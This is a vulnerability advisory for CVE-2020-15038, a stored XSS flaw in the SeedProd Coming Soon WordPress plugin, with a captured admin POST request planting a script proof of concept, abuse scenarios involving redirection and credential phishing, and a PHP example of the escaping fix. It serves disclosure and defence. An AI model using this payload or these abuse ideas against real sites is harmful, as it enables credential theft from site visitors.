CVE-2020-15038: XSS Found In Coming Soon Page and Maintenance Mode Plugin

The SeedProd coming-soon plugin before 5.1.1 for WordPress allows XSS.


While auditing the Coming Soon Page, Under Construction & Maintenance Mode by SeedProd plugin for WordPress, I found that versions 5.1.0 and below are vulnerable to stored XSS. Version 5.1.2, which adds improved data sanitization, was released on June 24, 2020.

CVE ID: CVE-2020-15038

Summary

Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress plugin with over 1 million active installations. It was found to contain a stored Cross-Site Scripting (XSS) vulnerability. XSS allows an attacker to run script in the victim’s browser in the context of the vulnerable site, which can be used to steal the victim’s session cookies or login credentials, perform arbitrary actions on the victim’s behalf, log their keystrokes and more.

Impact

There are several ways an attacker could abuse this vulnerability; two are described below.

  • Redirection:

    An attacker who plants an XSS payload in the Coming Soon page can make it redirect visitors. Any time the site owner enables maintenance mode, a user visiting the site would be sent to a domain under the attacker’s control, which could be made to look exactly like the original website and present a login form. If the user submits their credentials without noticing the changed domain, their account is compromised.

  • Phishing:

    Similarly, an attacker could use a payload that injects a login form into the Coming Soon/Maintenance Mode page itself, baiting unsuspecting users into entering their credentials.

Vulnerability

The Headline field under the Page Settings section, along with other fields in the plugin settings, was found to be vulnerable to stored XSS. The payload is triggered whenever the Coming Soon page is rendered, both in preview mode and when the page is live. The request below, captured while saving the plugin settings, stores a proof-of-concept payload in the headline field. Note that the settings are submitted to WordPress’s /wp-admin/options.php, which only accepts an update from a user with the manage_options capability and a valid nonce, so the payload has to be planted from a privileged account.

POST /wp-admin/options.php HTTP/1.1
Host: localhost:10004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
Content-Type: application/x-www-form-urlencoded
Content-Length: 636
Origin: http://localhost:10004
Connection: close
Cookie: ...

option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=
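To show why the captured request above results in stored XSS, and what the sanitization fix has to do, here is an added example in plain PHP. It is not the SeedProd plugin’s code: it replays an abridged copy of the captured POST body through a renderer that echoes the stored headline as-is (the vulnerable pattern) and through one that escapes on output, and adds a sanitize-on-save step. It uses only PHP built-ins so it runs without WordPress; the WordPress functions that play the same role are named in the comments.

```php
<?php
// Added example, not code from the SeedProd plugin. Replays the captured
// request body from this write-up against a vulnerable and a fixed renderer
// using only PHP built-ins, so it runs without WordPress.

// Abridged copy of the POST body shown above (cookie and unrelated fields
// dropped). parse_str() decodes it the same way PHP does for $_POST, turning
// the bracket notation into a nested array.
$body = 'option_page=seed_csp4_settings_content&action=update'
      . '&seed_csp4_settings_content%5Bstatus%5D=1'
      . '&seed_csp4_settings_content%5Bheadline%5D='
      . '%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E'
      . '&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept';

parse_str($body, $post);
$submitted = $post['seed_csp4_settings_content'];

// Vulnerable pattern: the stored option is echoed into the page unchanged, so
// the browser parses the stored <script> element as markup and runs it.
function render_headline_vulnerable(array $settings): string
{
    return '<h1>' . $settings['headline'] . '</h1>';
}

// Fix, part 1 (output): escape at the point of rendering. In WordPress this is
// esc_html(); htmlspecialchars() is the plain-PHP equivalent. The browser now
// shows the payload as text instead of executing it.
function render_headline_escaped(array $settings): string
{
    $safe = htmlspecialchars($settings['headline'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h1>' . $safe . '</h1>';
}

// Fix, part 2 (input): strip markup before the value is written to the
// database. In WordPress this belongs in the 'sanitize_callback' argument of
// register_setting() (sanitize_text_field() for plain text, wp_kses_post()
// where limited HTML is wanted). strip_tags() stands in for those here.
function sanitize_settings(array $input): array
{
    $clean = [];
    foreach (['status', 'headline', 'description'] as $key) {
        $clean[$key] = isset($input[$key]) ? trim(strip_tags((string) $input[$key])) : '';
    }
    return $clean;
}

echo "Decoded headline:   {$submitted['headline']}\n";
echo "Vulnerable output:  " . render_headline_vulnerable($submitted) . "\n";
echo "Escaped output:     " . render_headline_escaped($submitted) . "\n";

$stored = sanitize_settings($submitted);
echo "Stored after sanitize_callback: " . var_export($stored['headline'], true) . "\n";
```

Running the script prints the decoded `<script>alert("Stored XSS in Page Headline")</script>` payload, the vulnerable `<h1>` wrapping it verbatim, and the escaped form `&lt;script&gt;alert(&quot;Stored XSS in Page Headline&quot;)&lt;/script&gt;`, followed by the tag-stripped value that a sanitize callback would store. Output escaping is the primary control, since a value stored before the fix is still in the database; sanitizing on save is defense in depth.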

Timeline

Vulnerability reported to the SeedProd team on June 22, 2020.
Version 5.1.2 containing the fix to the vulnerability was released on June 24, 2020.

Recommendation

Update the plugin to version 5.1.2 or later, which contains the fix.

Reference

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15038
  • https://nvd.nist.gov/vuln/detail/CVE-2020-15038
  • https://wordpress.org/plugins/coming-soon/#developers
  • https://wpvulndb.com/vulnerabilities/10283


Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor’s degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.
